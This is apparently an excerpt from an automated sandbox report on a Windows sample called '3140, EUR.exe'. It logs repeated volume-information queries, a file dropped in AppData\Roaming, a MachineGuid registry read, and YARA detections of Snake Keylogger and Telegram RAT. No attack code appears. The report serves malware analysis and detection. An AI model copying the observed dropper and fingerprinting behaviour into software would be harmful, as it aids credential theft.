Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Users\user\Desktop\3140, EUR.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4122549015.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
